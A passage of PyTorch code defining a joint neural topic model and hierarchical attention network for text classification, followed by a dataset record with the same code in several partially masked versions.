self.context_rnn = nn.GRU(input_size=word_rnn_output_size, hidden_size=context_rnn_size,dropout=context_rnn_dropout,
num_layers=context_rnn_num_layer, bidirectional=context_rnn_bidirectional)
context_rnn_output_size = context_rnn_size * 2 if context_rnn_bidirectional else context_rnn_size
self.context_conv_attention_linear = nn.Linear(context_rnn_output_size, 1, bias=False)
self.classifier = nn.Sequential(nn.Linear(context_rnn_output_size, mlp_size),
nn.LeakyReLU(),
nn.Linear(mlp_size, num_label),
nn.Tanh())
if pretrained_embedding is not None:
self.embedding.weight.data = self.embedding.weight.data.new(pretrained_embedding)
def encoder(self, x):
if self.encoder_layers == 1:
pi = F.relu(self.en1_fc(x))
if self.encoder_shortcut:
pi = self.en_drop(pi)
else:
pi = F.relu(self.en1_fc(x))
pi = F.relu(self.en2_fc(pi))
if self.encoder_shortcut:
pi = self.en_drop(pi)
# mean = self.mean_bn(self.mean_fc(pi))
# logvar = self.logvar_bn(self.logvar_fc(pi))
mean = self.mean_fc(pi)
logvar = self.logvar_fc(pi)
return mean, logvar
def sampler(self, mean, logvar, cuda):
eps = torch.randn(mean.size()).cuda(cuda)
sigma = torch.exp(logvar)
h = sigma.mul(eps).add_(mean)
return h
def generator(self, h):
# temp = self.generator1(h)
# if self.generator_shortcut:
# r = F.tanh(temp) + h
# else:
# r = temp
if self.generator_layers == 0:
r = h
elif self.generator_layers == 1:
temp = self.generator1(h)
if self.generator_shortcut:
r = F.tanh(temp) + h
else:
r = temp
elif self.generator_layers == 2:
temp = F.tanh(self.generator1(h))
temp2 = self.generator2(temp)
if self.generator_shortcut:
r = F.tanh(temp2) + h
else:
r = temp2
else:
temp = F.tanh(self.generator1(h))
temp2 = F.tanh(self.generator2(temp))
temp3 = F.tanh(self.generator3(temp2))
temp4 = self.generator4(temp3)
if self.generator_shortcut:
r = F.tanh(temp4) + h
else:
r = temp4
if self.generator_transform == 'tanh':
return self.r_drop(F.tanh(r))
elif self.generator_transform == 'softmax':
return self.r_drop(F.softmax(r)[0])
elif self.generator_transform == 'relu':
return self.r_drop(F.relu(r))
else:
return self.r_drop(r)
def decoder(self, r):
# p_x_given_h = F.softmax(self.de_bn(self.de(r)))
p_x_given_h = F.softmax(self.de(r))
return p_x_given_h
def init_rnn_hidden(self, batch_size, level):
param_data = next(self.parameters()).data
if level == "word":
bidirectional_multipier = 2 if self.word_rnn_bidirectional else 1
layer_size = self.word_rnn_num_layer * bidirectional_multipier
word_rnn_init_hidden = param_data.new(layer_size, batch_size, self.word_rnn_size).zero_()
return word_rnn_init_hidden
elif level == "context":
bidirectional_multipier = 2 if self.context_rnn_bidirectional else 1
layer_size = self.context_rnn_num_layer * bidirectional_multipier
context_rnn_init_hidden = param_data.new(layer_size, batch_size, self.context_rnn_size).zero_()
return context_rnn_init_hidden
else:
raise Exception("level must be 'word' or 'context'")
def continuous_parameters(self):
for name, param in self.named_parameters():
if not name.startswith("selector"):
yield param
def discrete_parameters(self):
for name, param in self.named_parameters():
if name.startswith("selector"):
yield param
def forward(self, x, x_indices, input_list, length_list, cuda):
###topic model
mean, logvar = self.encoder(x) # batchsize*50
h = self.sampler(mean, logvar, cuda) # batchsize*50
r = self.generator(h) # batchsize*50
p_x_given_h = self.decoder(r) # batchsize*dv
###HAN
num_utterance = len(input_list) # one batch doucument_list
_, batch_size = input_list[0].size()
# word-level rnn
word_rnn_hidden = self.init_rnn_hidden(batch_size, level="word")
word_rnn_output_list = []
word_attention_dict = {}
# de_weight = torch.zeros(self.d_v, self.d_t).cuda()
# de_weight.copy_(self.de.weight.data)
for utterance_index in range(num_utterance):
word_rnn_input = self.embedding(input_list[utterance_index])
word_rnn_output, word_rnn_hidden = self.word_rnn(word_rnn_input, word_rnn_hidden)
word_attention_weight = self.word_conv_attention_linear(word_rnn_output)
# word_attention_weight = Variable(torch.zeros(word_attention_weight.size()).cuda())
batch_data = input_list[utterance_index]
for word_i in range(len(batch_data)): # word_i word
for clause_i in range(len(batch_data[word_i])): # clause_i data(batch)
word_index = int(batch_data[word_i, clause_i]) # word index
if word_index < self.d_v:
if word_index in word_attention_dict:
word_attention_dict[word_index] = (word_attention_dict[word_index] + word_attention_weight[word_i, clause_i,:]) / 2
else:
word_attention_dict[word_index] = word_attention_weight[word_i, clause_i, :]
##HAN
word_attention_weight = self.word_conv_attention_linear2(word_attention_weight)
word_attention_weight = nn.functional.relu(word_attention_weight)
word_attention_weight = nn.functional.softmax(word_attention_weight, dim=0)
word_rnn_last_output = torch.mul(word_rnn_output, word_attention_weight).sum(dim=0)
word_rnn_output_list.append(word_rnn_last_output)
word_rnn_hidden = word_rnn_hidden.detach()
# context-level rnn
context_rnn_hidden = self.init_rnn_hidden(batch_size, level="context")
context_rnn_input = torch.stack(word_rnn_output_list, dim=0)
context_rnn_output, context_rnn_hidden = self.context_rnn(context_rnn_input, context_rnn_hidden)
context_attention_weight = self.context_conv_attention_linear(context_rnn_output)
context_attention_weight = nn.functional.relu(context_attention_weight)
context_attention_weight = nn.functional.softmax(context_attention_weight, dim=0)
context_rnn_last_output = torch.mul(context_rnn_output, context_attention_weight).sum(dim=0)
classifier_input = context_rnn_last_output
logit = self.classifier(classifier_input)
return mean, logvar, p_x_given_h, logit, word_attention_dict
|
normal
|
{
"blob_id": "4f3e297b6925f8d65aacaa59bb837e746747c33f",
"index": 2608,
"step-1": "<mask token>\n\n\nclass JointModel(nn.Module):\n\n def __init__(self, d_v, d_e, d_t, encoder_layers, generator_layers,\n encoder_shortcut, generator_shortcut, generator_transform, num_word,\n emb_size, word_rnn_size, word_rnn_num_layer, word_rnn_dropout,\n word_rnn_bidirectional, word_attention_size, context_rnn_size,\n context_rnn_num_layer, context_rnn_dropout,\n context_rnn_bidirectional, context_attention_size, mlp_size,\n num_label, pretrained_embedding):\n super(JointModel, self).__init__()\n self.d_v = d_v\n self.d_e = d_e\n self.d_t = d_t\n self.encoder_layers = encoder_layers\n self.generator_layers = generator_layers\n self.generator_transform = generator_transform\n self.encoder_shortcut = encoder_shortcut\n self.generator_shortcut = generator_shortcut\n self.en1_fc = nn.Linear(self.d_v, self.d_e)\n self.en2_fc = nn.Linear(self.d_e, self.d_e)\n self.en_drop = nn.Dropout(0.2)\n self.mean_fc = nn.Linear(self.d_e, self.d_t)\n self.logvar_fc = nn.Linear(self.d_e, self.d_t)\n self.generator1 = nn.Linear(self.d_t, self.d_t)\n self.generator2 = nn.Linear(self.d_t, self.d_t)\n self.generator3 = nn.Linear(self.d_t, self.d_t)\n self.generator4 = nn.Linear(self.d_t, self.d_t)\n self.r_drop = nn.Dropout(0.2)\n self.de = nn.Linear(self.d_t, self.d_v)\n self.emb_size = emb_size\n self.word_rnn_size = word_rnn_size\n self.word_rnn_num_layer = word_rnn_num_layer\n self.word_rnn_bidirectional = word_rnn_bidirectional\n self.context_rnn_size = context_rnn_size\n self.context_rnn_num_layer = context_rnn_num_layer\n self.context_rnn_bidirectional = context_rnn_bidirectional\n self.num_label = num_label\n self.embedding = nn.Embedding(num_word, emb_size)\n self.word_rnn = nn.GRU(input_size=emb_size, hidden_size=\n word_rnn_size, dropout=word_rnn_dropout, num_layers=\n word_rnn_num_layer, bidirectional=word_rnn_bidirectional)\n word_rnn_output_size = (word_rnn_size * 2 if word_rnn_bidirectional\n else word_rnn_size)\n self.word_conv_attention_linear = nn.Linear(word_rnn_output_size,\n self.d_t, bias=False)\n self.word_conv_attention_linear2 = nn.Linear(self.d_t, 1, bias=False)\n self.context_rnn = nn.GRU(input_size=word_rnn_output_size,\n hidden_size=context_rnn_size, dropout=context_rnn_dropout,\n num_layers=context_rnn_num_layer, bidirectional=\n context_rnn_bidirectional)\n context_rnn_output_size = (context_rnn_size * 2 if\n context_rnn_bidirectional else context_rnn_size)\n self.context_conv_attention_linear = nn.Linear(context_rnn_output_size,\n 1, bias=False)\n self.classifier = nn.Sequential(nn.Linear(context_rnn_output_size,\n mlp_size), nn.LeakyReLU(), nn.Linear(mlp_size, num_label), nn.\n Tanh())\n if pretrained_embedding is not None:\n self.embedding.weight.data = self.embedding.weight.data.new(\n pretrained_embedding)\n\n def encoder(self, x):\n if self.encoder_layers == 1:\n pi = F.relu(self.en1_fc(x))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n else:\n pi = F.relu(self.en1_fc(x))\n pi = F.relu(self.en2_fc(pi))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n mean = self.mean_fc(pi)\n logvar = self.logvar_fc(pi)\n return mean, logvar\n <mask token>\n\n def generator(self, h):\n if self.generator_layers == 0:\n r = h\n elif self.generator_layers == 1:\n temp = self.generator1(h)\n if self.generator_shortcut:\n r = F.tanh(temp) + h\n else:\n r = temp\n elif self.generator_layers == 2:\n temp = F.tanh(self.generator1(h))\n temp2 = self.generator2(temp)\n if self.generator_shortcut:\n r = F.tanh(temp2) + h\n else:\n r = temp2\n else:\n temp = F.tanh(self.generator1(h))\n temp2 = F.tanh(self.generator2(temp))\n temp3 = F.tanh(self.generator3(temp2))\n temp4 = self.generator4(temp3)\n if self.generator_shortcut:\n r = F.tanh(temp4) + h\n else:\n r = temp4\n if self.generator_transform == 'tanh':\n return self.r_drop(F.tanh(r))\n elif self.generator_transform == 'softmax':\n return self.r_drop(F.softmax(r)[0])\n elif self.generator_transform == 'relu':\n return self.r_drop(F.relu(r))\n else:\n return self.r_drop(r)\n <mask token>\n <mask token>\n <mask token>\n\n def discrete_parameters(self):\n for name, param in self.named_parameters():\n if name.startswith('selector'):\n yield param\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass JointModel(nn.Module):\n\n def __init__(self, d_v, d_e, d_t, encoder_layers, generator_layers,\n encoder_shortcut, generator_shortcut, generator_transform, num_word,\n emb_size, word_rnn_size, word_rnn_num_layer, word_rnn_dropout,\n word_rnn_bidirectional, word_attention_size, context_rnn_size,\n context_rnn_num_layer, context_rnn_dropout,\n context_rnn_bidirectional, context_attention_size, mlp_size,\n num_label, pretrained_embedding):\n super(JointModel, self).__init__()\n self.d_v = d_v\n self.d_e = d_e\n self.d_t = d_t\n self.encoder_layers = encoder_layers\n self.generator_layers = generator_layers\n self.generator_transform = generator_transform\n self.encoder_shortcut = encoder_shortcut\n self.generator_shortcut = generator_shortcut\n self.en1_fc = nn.Linear(self.d_v, self.d_e)\n self.en2_fc = nn.Linear(self.d_e, self.d_e)\n self.en_drop = nn.Dropout(0.2)\n self.mean_fc = nn.Linear(self.d_e, self.d_t)\n self.logvar_fc = nn.Linear(self.d_e, self.d_t)\n self.generator1 = nn.Linear(self.d_t, self.d_t)\n self.generator2 = nn.Linear(self.d_t, self.d_t)\n self.generator3 = nn.Linear(self.d_t, self.d_t)\n self.generator4 = nn.Linear(self.d_t, self.d_t)\n self.r_drop = nn.Dropout(0.2)\n self.de = nn.Linear(self.d_t, self.d_v)\n self.emb_size = emb_size\n self.word_rnn_size = word_rnn_size\n self.word_rnn_num_layer = word_rnn_num_layer\n self.word_rnn_bidirectional = word_rnn_bidirectional\n self.context_rnn_size = context_rnn_size\n self.context_rnn_num_layer = context_rnn_num_layer\n self.context_rnn_bidirectional = context_rnn_bidirectional\n self.num_label = num_label\n self.embedding = nn.Embedding(num_word, emb_size)\n self.word_rnn = nn.GRU(input_size=emb_size, hidden_size=\n word_rnn_size, dropout=word_rnn_dropout, num_layers=\n word_rnn_num_layer, bidirectional=word_rnn_bidirectional)\n word_rnn_output_size = (word_rnn_size * 2 if word_rnn_bidirectional\n else word_rnn_size)\n self.word_conv_attention_linear = nn.Linear(word_rnn_output_size,\n self.d_t, bias=False)\n self.word_conv_attention_linear2 = nn.Linear(self.d_t, 1, bias=False)\n self.context_rnn = nn.GRU(input_size=word_rnn_output_size,\n hidden_size=context_rnn_size, dropout=context_rnn_dropout,\n num_layers=context_rnn_num_layer, bidirectional=\n context_rnn_bidirectional)\n context_rnn_output_size = (context_rnn_size * 2 if\n context_rnn_bidirectional else context_rnn_size)\n self.context_conv_attention_linear = nn.Linear(context_rnn_output_size,\n 1, bias=False)\n self.classifier = nn.Sequential(nn.Linear(context_rnn_output_size,\n mlp_size), nn.LeakyReLU(), nn.Linear(mlp_size, num_label), nn.\n Tanh())\n if pretrained_embedding is not None:\n self.embedding.weight.data = self.embedding.weight.data.new(\n pretrained_embedding)\n\n def encoder(self, x):\n if self.encoder_layers == 1:\n pi = F.relu(self.en1_fc(x))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n else:\n pi = F.relu(self.en1_fc(x))\n pi = F.relu(self.en2_fc(pi))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n mean = self.mean_fc(pi)\n logvar = self.logvar_fc(pi)\n return mean, logvar\n <mask token>\n\n def generator(self, h):\n if self.generator_layers == 0:\n r = h\n elif self.generator_layers == 1:\n temp = self.generator1(h)\n if self.generator_shortcut:\n r = F.tanh(temp) + h\n else:\n r = temp\n elif self.generator_layers == 2:\n temp = F.tanh(self.generator1(h))\n temp2 = self.generator2(temp)\n if self.generator_shortcut:\n r = F.tanh(temp2) + h\n else:\n r = temp2\n else:\n temp = F.tanh(self.generator1(h))\n temp2 = F.tanh(self.generator2(temp))\n temp3 = F.tanh(self.generator3(temp2))\n temp4 = self.generator4(temp3)\n if self.generator_shortcut:\n r = F.tanh(temp4) + h\n else:\n r = temp4\n if self.generator_transform == 'tanh':\n return self.r_drop(F.tanh(r))\n elif self.generator_transform == 'softmax':\n return self.r_drop(F.softmax(r)[0])\n elif self.generator_transform == 'relu':\n return self.r_drop(F.relu(r))\n else:\n return self.r_drop(r)\n <mask token>\n\n def init_rnn_hidden(self, batch_size, level):\n param_data = next(self.parameters()).data\n if level == 'word':\n bidirectional_multipier = 2 if self.word_rnn_bidirectional else 1\n layer_size = self.word_rnn_num_layer * bidirectional_multipier\n word_rnn_init_hidden = param_data.new(layer_size, batch_size,\n self.word_rnn_size).zero_()\n return word_rnn_init_hidden\n elif level == 'context':\n bidirectional_multipier = (2 if self.context_rnn_bidirectional else\n 1)\n layer_size = self.context_rnn_num_layer * bidirectional_multipier\n context_rnn_init_hidden = param_data.new(layer_size, batch_size,\n self.context_rnn_size).zero_()\n return context_rnn_init_hidden\n else:\n raise Exception(\"level must be 'word' or 'context'\")\n <mask token>\n\n def discrete_parameters(self):\n for name, param in self.named_parameters():\n if name.startswith('selector'):\n yield param\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass JointModel(nn.Module):\n\n def __init__(self, d_v, d_e, d_t, encoder_layers, generator_layers,\n encoder_shortcut, generator_shortcut, generator_transform, num_word,\n emb_size, word_rnn_size, word_rnn_num_layer, word_rnn_dropout,\n word_rnn_bidirectional, word_attention_size, context_rnn_size,\n context_rnn_num_layer, context_rnn_dropout,\n context_rnn_bidirectional, context_attention_size, mlp_size,\n num_label, pretrained_embedding):\n super(JointModel, self).__init__()\n self.d_v = d_v\n self.d_e = d_e\n self.d_t = d_t\n self.encoder_layers = encoder_layers\n self.generator_layers = generator_layers\n self.generator_transform = generator_transform\n self.encoder_shortcut = encoder_shortcut\n self.generator_shortcut = generator_shortcut\n self.en1_fc = nn.Linear(self.d_v, self.d_e)\n self.en2_fc = nn.Linear(self.d_e, self.d_e)\n self.en_drop = nn.Dropout(0.2)\n self.mean_fc = nn.Linear(self.d_e, self.d_t)\n self.logvar_fc = nn.Linear(self.d_e, self.d_t)\n self.generator1 = nn.Linear(self.d_t, self.d_t)\n self.generator2 = nn.Linear(self.d_t, self.d_t)\n self.generator3 = nn.Linear(self.d_t, self.d_t)\n self.generator4 = nn.Linear(self.d_t, self.d_t)\n self.r_drop = nn.Dropout(0.2)\n self.de = nn.Linear(self.d_t, self.d_v)\n self.emb_size = emb_size\n self.word_rnn_size = word_rnn_size\n self.word_rnn_num_layer = word_rnn_num_layer\n self.word_rnn_bidirectional = word_rnn_bidirectional\n self.context_rnn_size = context_rnn_size\n self.context_rnn_num_layer = context_rnn_num_layer\n self.context_rnn_bidirectional = context_rnn_bidirectional\n self.num_label = num_label\n self.embedding = nn.Embedding(num_word, emb_size)\n self.word_rnn = nn.GRU(input_size=emb_size, hidden_size=\n word_rnn_size, dropout=word_rnn_dropout, num_layers=\n word_rnn_num_layer, bidirectional=word_rnn_bidirectional)\n word_rnn_output_size = (word_rnn_size * 2 if word_rnn_bidirectional\n else word_rnn_size)\n self.word_conv_attention_linear = nn.Linear(word_rnn_output_size,\n self.d_t, bias=False)\n self.word_conv_attention_linear2 = nn.Linear(self.d_t, 1, bias=False)\n self.context_rnn = nn.GRU(input_size=word_rnn_output_size,\n hidden_size=context_rnn_size, dropout=context_rnn_dropout,\n num_layers=context_rnn_num_layer, bidirectional=\n context_rnn_bidirectional)\n context_rnn_output_size = (context_rnn_size * 2 if\n context_rnn_bidirectional else context_rnn_size)\n self.context_conv_attention_linear = nn.Linear(context_rnn_output_size,\n 1, bias=False)\n self.classifier = nn.Sequential(nn.Linear(context_rnn_output_size,\n mlp_size), nn.LeakyReLU(), nn.Linear(mlp_size, num_label), nn.\n Tanh())\n if pretrained_embedding is not None:\n self.embedding.weight.data = self.embedding.weight.data.new(\n pretrained_embedding)\n\n def encoder(self, x):\n if self.encoder_layers == 1:\n pi = F.relu(self.en1_fc(x))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n else:\n pi = F.relu(self.en1_fc(x))\n pi = F.relu(self.en2_fc(pi))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n mean = self.mean_fc(pi)\n logvar = self.logvar_fc(pi)\n return mean, logvar\n\n def sampler(self, mean, logvar, cuda):\n eps = torch.randn(mean.size()).cuda(cuda)\n sigma = torch.exp(logvar)\n h = sigma.mul(eps).add_(mean)\n return h\n\n def generator(self, h):\n if self.generator_layers == 0:\n r = h\n elif self.generator_layers == 1:\n temp = self.generator1(h)\n if self.generator_shortcut:\n r = F.tanh(temp) + h\n else:\n r = temp\n elif self.generator_layers == 2:\n temp = F.tanh(self.generator1(h))\n temp2 = self.generator2(temp)\n if self.generator_shortcut:\n r = F.tanh(temp2) + h\n else:\n r = temp2\n else:\n temp = F.tanh(self.generator1(h))\n temp2 = F.tanh(self.generator2(temp))\n temp3 = F.tanh(self.generator3(temp2))\n temp4 = self.generator4(temp3)\n if self.generator_shortcut:\n r = F.tanh(temp4) + h\n else:\n r = temp4\n if self.generator_transform == 'tanh':\n return self.r_drop(F.tanh(r))\n elif self.generator_transform == 'softmax':\n return self.r_drop(F.softmax(r)[0])\n elif self.generator_transform == 'relu':\n return self.r_drop(F.relu(r))\n else:\n return self.r_drop(r)\n <mask token>\n\n def init_rnn_hidden(self, batch_size, level):\n param_data = next(self.parameters()).data\n if level == 'word':\n bidirectional_multipier = 2 if self.word_rnn_bidirectional else 1\n layer_size = self.word_rnn_num_layer * bidirectional_multipier\n word_rnn_init_hidden = param_data.new(layer_size, batch_size,\n self.word_rnn_size).zero_()\n return word_rnn_init_hidden\n elif level == 'context':\n bidirectional_multipier = (2 if self.context_rnn_bidirectional else\n 1)\n layer_size = self.context_rnn_num_layer * bidirectional_multipier\n context_rnn_init_hidden = param_data.new(layer_size, batch_size,\n self.context_rnn_size).zero_()\n return context_rnn_init_hidden\n else:\n raise Exception(\"level must be 'word' or 'context'\")\n\n def continuous_parameters(self):\n for name, param in self.named_parameters():\n if not name.startswith('selector'):\n yield param\n\n def discrete_parameters(self):\n for name, param in self.named_parameters():\n if name.startswith('selector'):\n yield param\n <mask token>\n",
"step-4": "import torch\nfrom torch import nn\nimport torch.nn.functional as F\n\n\nclass JointModel(nn.Module):\n\n def __init__(self, d_v, d_e, d_t, encoder_layers, generator_layers,\n encoder_shortcut, generator_shortcut, generator_transform, num_word,\n emb_size, word_rnn_size, word_rnn_num_layer, word_rnn_dropout,\n word_rnn_bidirectional, word_attention_size, context_rnn_size,\n context_rnn_num_layer, context_rnn_dropout,\n context_rnn_bidirectional, context_attention_size, mlp_size,\n num_label, pretrained_embedding):\n super(JointModel, self).__init__()\n self.d_v = d_v\n self.d_e = d_e\n self.d_t = d_t\n self.encoder_layers = encoder_layers\n self.generator_layers = generator_layers\n self.generator_transform = generator_transform\n self.encoder_shortcut = encoder_shortcut\n self.generator_shortcut = generator_shortcut\n self.en1_fc = nn.Linear(self.d_v, self.d_e)\n self.en2_fc = nn.Linear(self.d_e, self.d_e)\n self.en_drop = nn.Dropout(0.2)\n self.mean_fc = nn.Linear(self.d_e, self.d_t)\n self.logvar_fc = nn.Linear(self.d_e, self.d_t)\n self.generator1 = nn.Linear(self.d_t, self.d_t)\n self.generator2 = nn.Linear(self.d_t, self.d_t)\n self.generator3 = nn.Linear(self.d_t, self.d_t)\n self.generator4 = nn.Linear(self.d_t, self.d_t)\n self.r_drop = nn.Dropout(0.2)\n self.de = nn.Linear(self.d_t, self.d_v)\n self.emb_size = emb_size\n self.word_rnn_size = word_rnn_size\n self.word_rnn_num_layer = word_rnn_num_layer\n self.word_rnn_bidirectional = word_rnn_bidirectional\n self.context_rnn_size = context_rnn_size\n self.context_rnn_num_layer = context_rnn_num_layer\n self.context_rnn_bidirectional = context_rnn_bidirectional\n self.num_label = num_label\n self.embedding = nn.Embedding(num_word, emb_size)\n self.word_rnn = nn.GRU(input_size=emb_size, hidden_size=\n word_rnn_size, dropout=word_rnn_dropout, num_layers=\n word_rnn_num_layer, bidirectional=word_rnn_bidirectional)\n word_rnn_output_size = (word_rnn_size * 2 if word_rnn_bidirectional\n else word_rnn_size)\n self.word_conv_attention_linear = nn.Linear(word_rnn_output_size,\n self.d_t, bias=False)\n self.word_conv_attention_linear2 = nn.Linear(self.d_t, 1, bias=False)\n self.context_rnn = nn.GRU(input_size=word_rnn_output_size,\n hidden_size=context_rnn_size, dropout=context_rnn_dropout,\n num_layers=context_rnn_num_layer, bidirectional=\n context_rnn_bidirectional)\n context_rnn_output_size = (context_rnn_size * 2 if\n context_rnn_bidirectional else context_rnn_size)\n self.context_conv_attention_linear = nn.Linear(context_rnn_output_size,\n 1, bias=False)\n self.classifier = nn.Sequential(nn.Linear(context_rnn_output_size,\n mlp_size), nn.LeakyReLU(), nn.Linear(mlp_size, num_label), nn.\n Tanh())\n if pretrained_embedding is not None:\n self.embedding.weight.data = self.embedding.weight.data.new(\n pretrained_embedding)\n\n def encoder(self, x):\n if self.encoder_layers == 1:\n pi = F.relu(self.en1_fc(x))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n else:\n pi = F.relu(self.en1_fc(x))\n pi = F.relu(self.en2_fc(pi))\n if self.encoder_shortcut:\n pi = self.en_drop(pi)\n mean = self.mean_fc(pi)\n logvar = self.logvar_fc(pi)\n return mean, logvar\n\n def sampler(self, mean, logvar, cuda):\n eps = torch.randn(mean.size()).cuda(cuda)\n sigma = torch.exp(logvar)\n h = sigma.mul(eps).add_(mean)\n return h\n\n def generator(self, h):\n if self.generator_layers == 0:\n r = h\n elif self.generator_layers == 1:\n temp = self.generator1(h)\n if self.generator_shortcut:\n r = F.tanh(temp) + h\n else:\n r = temp\n elif self.generator_layers == 2:\n temp = F.tanh(self.generator1(h))\n temp2 = self.generator2(temp)\n if self.generator_shortcut:\n r = F.tanh(temp2) + h\n else:\n r = temp2\n else:\n temp = F.tanh(self.generator1(h))\n temp2 = F.tanh(self.generator2(temp))\n temp3 = F.tanh(self.generator3(temp2))\n temp4 = self.generator4(temp3)\n if self.generator_shortcut:\n r = F.tanh(temp4) + h\n else:\n r = temp4\n if self.generator_transform == 'tanh':\n return self.r_drop(F.tanh(r))\n elif self.generator_transform == 'softmax':\n return self.r_drop(F.softmax(r)[0])\n elif self.generator_transform == 'relu':\n return self.r_drop(F.relu(r))\n else:\n return self.r_drop(r)\n\n def decoder(self, r):\n p_x_given_h = F.softmax(self.de(r))\n return p_x_given_h\n\n def init_rnn_hidden(self, batch_size, level):\n param_data = next(self.parameters()).data\n if level == 'word':\n bidirectional_multipier = 2 if self.word_rnn_bidirectional else 1\n layer_size = self.word_rnn_num_layer * bidirectional_multipier\n word_rnn_init_hidden = param_data.new(layer_size, batch_size,\n self.word_rnn_size).zero_()\n return word_rnn_init_hidden\n elif level == 'context':\n bidirectional_multipier = (2 if self.context_rnn_bidirectional else\n 1)\n layer_size = self.context_rnn_num_layer * bidirectional_multipier\n context_rnn_init_hidden = param_data.new(layer_size, batch_size,\n self.context_rnn_size).zero_()\n return context_rnn_init_hidden\n else:\n raise Exception(\"level must be 'word' or 'context'\")\n\n def continuous_parameters(self):\n for name, param in self.named_parameters():\n if not name.startswith('selector'):\n yield param\n\n def discrete_parameters(self):\n for name, param in self.named_parameters():\n if name.startswith('selector'):\n yield param\n\n def forward(self, x, x_indices, input_list, length_list, cuda):\n mean, logvar = self.encoder(x)\n h = self.sampler(mean, logvar, cuda)\n r = self.generator(h)\n p_x_given_h = self.decoder(r)\n num_utterance = len(input_list)\n _, batch_size = input_list[0].size()\n word_rnn_hidden = self.init_rnn_hidden(batch_size, level='word')\n word_rnn_output_list = []\n word_attention_dict = {}\n for utterance_index in range(num_utterance):\n word_rnn_input = self.embedding(input_list[utterance_index])\n word_rnn_output, word_rnn_hidden = self.word_rnn(word_rnn_input,\n word_rnn_hidden)\n word_attention_weight = self.word_conv_attention_linear(\n word_rnn_output)\n batch_data = input_list[utterance_index]\n for word_i in range(len(batch_data)):\n for clause_i in range(len(batch_data[word_i])):\n word_index = int(batch_data[word_i, clause_i])\n if word_index < self.d_v:\n if word_index in word_attention_dict:\n word_attention_dict[word_index] = (\n word_attention_dict[word_index] +\n word_attention_weight[word_i, clause_i, :]) / 2\n else:\n word_attention_dict[word_index\n ] = word_attention_weight[word_i, clause_i, :]\n word_attention_weight = self.word_conv_attention_linear2(\n word_attention_weight)\n word_attention_weight = nn.functional.relu(word_attention_weight)\n word_attention_weight = nn.functional.softmax(word_attention_weight\n , dim=0)\n word_rnn_last_output = torch.mul(word_rnn_output,\n word_attention_weight).sum(dim=0)\n word_rnn_output_list.append(word_rnn_last_output)\n word_rnn_hidden = word_rnn_hidden.detach()\n context_rnn_hidden = self.init_rnn_hidden(batch_size, level='context')\n context_rnn_input = torch.stack(word_rnn_output_list, dim=0)\n context_rnn_output, context_rnn_hidden = self.context_rnn(\n context_rnn_input, context_rnn_hidden)\n context_attention_weight = self.context_conv_attention_linear(\n context_rnn_output)\n context_attention_weight = nn.functional.relu(context_attention_weight)\n context_attention_weight = nn.functional.softmax(\n context_attention_weight, dim=0)\n context_rnn_last_output = torch.mul(context_rnn_output,\n context_attention_weight).sum(dim=0)\n classifier_input = context_rnn_last_output\n logit = self.classifier(classifier_input)\n return mean, logvar, p_x_given_h, logit, word_attention_dict\n",
"step-5": "import torch\nfrom torch import nn\nimport torch.nn.functional as F\n\nclass JointModel(nn.Module):\n def __init__(self, d_v, d_e, d_t, encoder_layers, generator_layers,encoder_shortcut, generator_shortcut, generator_transform,\n num_word, emb_size, word_rnn_size, word_rnn_num_layer, word_rnn_dropout, word_rnn_bidirectional,word_attention_size,\n context_rnn_size, context_rnn_num_layer, context_rnn_dropout, context_rnn_bidirectional,context_attention_size, mlp_size,\n num_label, pretrained_embedding):\n\n super(JointModel, self).__init__()\n\n ##NGTM:\n self.d_v = d_v # vocabulary size\n self.d_e = d_e # dimensionality of encoder\n self.d_t = d_t # number of topics\n self.encoder_layers = encoder_layers\n self.generator_layers = generator_layers\n self.generator_transform = generator_transform # transform to apply after the generator\n self.encoder_shortcut = encoder_shortcut\n self.generator_shortcut = generator_shortcut\n self.en1_fc = nn.Linear(self.d_v, self.d_e)\n self.en2_fc = nn.Linear(self.d_e, self.d_e)\n self.en_drop = nn.Dropout(0.2)\n self.mean_fc = nn.Linear(self.d_e, self.d_t)\n # self.mean_bn = nn.BatchNorm1d(self.d_t)\n self.logvar_fc = nn.Linear(self.d_e, self.d_t)\n # self.logvar_bn = nn.BatchNorm1d(self.d_t)\n self.generator1 = nn.Linear(self.d_t, self.d_t)\n self.generator2 = nn.Linear(self.d_t, self.d_t)\n self.generator3 = nn.Linear(self.d_t, self.d_t)\n self.generator4 = nn.Linear(self.d_t, self.d_t)\n self.r_drop = nn.Dropout(0.2)\n self.de = nn.Linear(self.d_t, self.d_v)\n # self.de_bn = nn.BatchNorm1d(self.d_v)\n\n ##HAN:\n self.emb_size = emb_size\n self.word_rnn_size = word_rnn_size\n self.word_rnn_num_layer = word_rnn_num_layer\n self.word_rnn_bidirectional = word_rnn_bidirectional\n self.context_rnn_size = context_rnn_size\n self.context_rnn_num_layer = context_rnn_num_layer\n self.context_rnn_bidirectional = context_rnn_bidirectional\n self.num_label = num_label\n self.embedding = nn.Embedding(num_word, emb_size)\n self.word_rnn = nn.GRU(input_size=emb_size, hidden_size=word_rnn_size, dropout=word_rnn_dropout,\n num_layers=word_rnn_num_layer, bidirectional=word_rnn_bidirectional)\n word_rnn_output_size = word_rnn_size * 2 if word_rnn_bidirectional else word_rnn_size\n self.word_conv_attention_linear = nn.Linear(word_rnn_output_size, self.d_t, bias=False)\n self.word_conv_attention_linear2 = nn.Linear(self.d_t, 1, bias=False)\n self.context_rnn = nn.GRU(input_size=word_rnn_output_size, hidden_size=context_rnn_size,dropout=context_rnn_dropout,\n num_layers=context_rnn_num_layer, bidirectional=context_rnn_bidirectional)\n context_rnn_output_size = context_rnn_size * 2 if context_rnn_bidirectional else context_rnn_size\n self.context_conv_attention_linear = nn.Linear(context_rnn_output_size, 1, bias=False)\n self.classifier = nn.Sequential(nn.Linear(context_rnn_output_size, mlp_size),\n nn.LeakyReLU(),\n nn.Linear(mlp_size, num_label),\n nn.Tanh())\n if pretrained_embedding is not None:\n self.embedding.weight.data = self.embedding.weight.data.new(pretrained_embedding)\n\n\n def encoder(self, x):\n if self.encoder_layers == 1:\n pi = F.relu(self.en1_fc(x))\n if self.encoder_shortcut:\n pi = 